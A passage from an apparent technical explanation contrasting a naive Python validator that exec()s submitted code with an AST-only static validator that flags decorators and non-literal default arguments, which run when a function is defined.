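            exec(compile(module, "<submitted>", "exec"), {"mark": mark})

def is_literal(expr):
    """True if expr is a plain constant or container that evaluates without running code."""
    try:
        ast.literal_eval(expr)
        return True
    except (ValueError, TypeError, SyntaxError):
        return False

def static_validate(source):
    """Parse only, never compile() or exec(); report what would run at definition time."""
    try:
        tree = ast.parse(source)
    except SyntaxError as exc:
        return {"errors": [f"line {exc.lineno}: {exc.msg}"], "findings": []}
    findings = []
    for node in ast.walk(tree):
        if not isinstance(node, (ast.FunctionDef, ast.AsyncFunctionDef)):
            continue
        for dec in node.decorator_list:  # a decorator is always invoked by the def statement
            findings.append((node.name, "decorator", ast.unparse(dec)))
        defaults = node.args.defaults + [d for d in node.args.kw_defaults if d is not None]
        for default in defaults:  # allowlist: only literal defaults pass
            if not is_literal(default):
                findings.append((node.name, "default", ast.unparse(default)))
    return {"errors": [], "findings": findings}
```

Running naive_validate on either constructed sample appends to EVALUATED even though foo() is never called, while static_validate reports the same expressions as findings and leaves EVALUATED untouched.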